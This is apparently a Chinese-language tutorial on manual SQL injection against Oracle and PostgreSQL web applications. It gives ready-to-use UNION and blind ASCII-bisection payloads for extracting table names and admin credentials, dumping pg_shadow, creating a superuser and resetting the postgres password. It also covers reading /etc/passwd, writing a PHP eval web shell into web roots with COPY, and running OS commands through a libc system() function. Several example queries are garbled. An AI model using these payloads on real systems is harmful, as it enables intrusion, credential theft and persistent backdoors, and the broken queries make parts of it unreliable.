oracle数据库介绍

Oracle数据库系统是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品。是目前世界上使用最为广泛的数据库管理系统。基于“客户端/服务器”模式结构,客户端应用程序与用户交互,接收用户信息,并向服务器发送请求,服务器系统负责管理数据信息和各种操作数据的活动。
特点

  1. 支持多用户、大事务量的处理
  2. 数据安全性和完整性的有效控制
  3. 支持分布式数据处理
  4. 移植性强

Oracle 手工注入

判断数据库

  • 判断注入

    1
    2
    and 1=1
    and 1=2

  • 判断oracle数据库

    1
    2
    and exists(select * from dual) 
    and exists(select * from user_tables)

    判断列数

    1
    2
    order by 11   返回正常
    order by 12    返回错误

    获取数据类型不匹配的列

    1
    http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,null,null,null,null,null,null,null,null,null,null from dual

    获取数据类型不匹配的列

  • 在每列上逐个用数字代替 如果返回正常说明该列为数字类型,反之则为非数字类型。

  • 也可以逐个用引号引起来如:’null’,null…from dual, 返回正常说明该列为字符类型,反之为非数字类型

获取基本信息

获取数据库版本

1
(select banner from sys.v_$version where rownum=1)

获取操作系统版本

1
( select member from v$logfile where rownum=1)

获取连接数据库的当前用户

1
( select SYS_CONTEXT ('USERENV','CURRENT_USER')from dual)

获取数据库

1
(select owner from all_tables where rownum=1)

获取数据库版本

1
http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null from dual

获取操作系统版本

1
http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select member from v$logfile where rownum=1),null,null,null,null,null,null,null,null,null from dual

获取连接数据库的当前用户

1
http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select SYS_CONTEXT ('USERENV','CURRENT_USER')from dual),null,null,null,null,null,null,null,null,null from dual

获取第一个表

1
http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select table_name from user_tables where rownum=1),null,null,null,null,null,null,null,null,null from dual

获取第二个表

1
http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select table_name from user_tables where rownum=1 and table_name<>'ACCESS$'),null,null,null,null,null,null,null,null,null from dual

获取第三个表

1
http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=100 union select null,( select table_name from user_tables where rownum=1 and table_name<>'ACCESS$'and table_name<>'ALERT_QT'),null,null,null,null,null,null,null,null,null from dual

以此类推就可以得到所有的表名

获取第一个列名

  • 假设我们得到管理员表名为:admin
  • 获取第一个列名EMPLOYEE_ID
    1
    http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=-100 union select null,(select column_name from user_tab_columns where table_name='admin' and rownum=1),4,5,6 from dual,null,null,null,null,null,null,null,null,null from dual

    获取第二个列名

    1
    http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=-100 union select null,(select column_name from user_tab_columns where table_name='admin' and rownum=1 and column_name<>'EMPLOYEE_ID'),4,5,6 from dual,null,null,null,null,null,null,null,null,null from dual
    得到表名为NAME

获取第三个列名

1
http://192.168.1.210:8080/SqlInject/SqlTest.jsp?id=-100 union select null,(select column_name from user_tab_columns where table_name='admin' and rownum=1 and column_name<>'EMPLOYEE_ID' and rownum=1 and column_name<>'NAME'),4,5,6 from dual,null,null,null,null,null,null,null,null,null from dual

得到表名为PASS

获取数据库

1
2
union select 1,2,name,4,5,6 from admin
union select 1,2,pass,4,5,6 from admin

第二种注入方式

  • 判断下该网站下有几个管理员

  • 如果有多个的话,成功入侵的几率就会加大

    1
    and (select count(*) from admin)=1,返回正常说明只有一个管理员。

    指定表名获取列名

    1
    and (select count(name) from admin)>=0   返回正常,说明存在name字段

    获取列名

    1
    and (select count(pass) from admin)>=0返回错误,说明不存在pass字段

    接下来采用ASCII码折半法猜解管理员帐号和密码

  • 判断管理员名字长度

    1
    and (select count(*) from admin where length(name)>=5)=1

  • 说明:length()函数用于求字符串的长度,此处猜测用户名的长度和5比较

1
and (select count(*) from admin where ascii(substr(name,1,1))>=97)=1
  • 说明:substr()函数用于截取字符串,ascii()函数用于获取字符的ascii码,此处的意思是截取name字段的第一个字符,获取它的ascii码值,查询ascii码表可知97为字符a
    1
    and (select count(*) from admin where ascii(substr(name,2,1))>=100)=1
  • 结果为100,即字符d,重复上述过程,可以判断出帐号为admin

    相同的方法猜解密码

    1
    and (select count(*) from admin where length(pwd)>=8)=1,
    返回正常,即密码长度为8,此时可以判断密码应该为明文
    1
    and (select count(*) from admin where ascii(substr(pwd,1,1))>=97)=1,
    返回正常,为字符a
1
2
and (select count(*) from admin where ascii(substr(pwd,2,1))>=100)=1,返回正常,为字符d
and (select count(*) from admin where ascii(substr(pwd,8,1))>=56)=1,返回正常,为数字8

完成上述操作可以确定帐号为:admin密码为:admin888

Postgresql 手工注入

postgresql介绍

PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL,版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL 可以用许多方法扩展,比如, 通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改、和分发 PostgreSQL,不管是私用、商用、还是学术研究使用。

postgresql数据库注入常用语法

判断是否为postgresql数据库

1
2
+and+1::int=1--
http://mysql.sql.com/sql.php?id=1+and+1::int=1--

判断数据库版本信息

1
+and+1=cast(version() as int)--

判断当前用户

1
and 1=cast(user||123 as int)

判断有多少字段

1
2
3
order by 
union select null,null,null
union select null,user,null   判断当前用户

判断数据库版本信息

1
union select null,version(),null--

判断用户权限

1
union+select+null,current_schema(),null

判断当前数据库名称

1
union+select+null,current_database(),null

判断当前表名

1
union+select+null,relname,null from pg_stat_user_tables

读取每个表的列名

1
union+select+null,column_name,null+from+information_schema.columns+where+table_name='表名'

列字段内容

1
+union+select+null,name||pass,null+from+admin

查看postgresql数据库的账号密码

1
+union+select+null,usename||chr(124)||passwd,null+from+pg_shadow

创建用户

1
;create+user+seven+with+superuser+password+'seven'--

修改postgres的用户密码为123456

1
;alter+user+postgres+with+password+'123456'--

Postgresql 写shell

直接拿shell

1
2
3
http://127.0.0.1/sql.php?id=1;create table shell(shell text not null);
http://127.0.0.1/sql.php?id=1;insert into shell values($$<?php @eval($_POST[test]);?>$$); 
http://127.0.0.1/sql.php?id=1;copy shell(shell) to '/var/www/html/shell.php';

另一种方法:

1
;copy (select '$$<?php @eval($_POST[test]);?>$$') to 'c:/inetpub/wwwroot/mysql-sql/ddd.php'

读取文件前20行

1
pg_read_file('/etc/passwd',1,20)

创建system函数

  • 用于版本大于8的数据库
    创建一个system的函数:
    1
    create FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
    创建一个输出表:
    1
    create table stdout(id serial, system_out text)
    执行shell,输出到输出表内:
    1
    2
    3
    select system('uname -a > /tmp/test')
    copy 输出的内容到表里面;
    COPY stdout(system_out) FROM '/tmp/test'
    从输出表内读取执行后的回显,判断是否执行成功
    1
    union all select NULL,(select stdout from system_out order by id desc),NULL limit 1 offset 1–-

    数据库备份还原

备份数据库

1
2
pg_dump -O -h 168.192.0.5 -U postgres mdb >c:\mdb.sql”
pg_dump -O -h 192.168.0.5 -U dbowner -w -p 5432 SS >SS.sql 这个是远程备份数据库备份到本地来

还原数据库

1
psql -h localhost -U postgres -d mdb

判断注入

1
2
3
‘  报错
and 1=1 返回正常
and 1=2 返回错误

获取信息

1
2
and 1=cast(version() as int)  获取数据库版本信息系统信息
and 1=cast(user||123 as int)  获取当前用户名称  postgres用户相当于root用户权限

创建表

1
;create table ccc(w text not null);  创建表x

插入一句话木马

1
;insert into ccc values($$<?php @eval($_POST[test]);?>$$);  向x表中插入一句话木马

导出一句话

1
;copy ccc(w) to $$/home/kasugai_tochi/public_html/script/test.php$$;  将一句话木马保存为test.php文件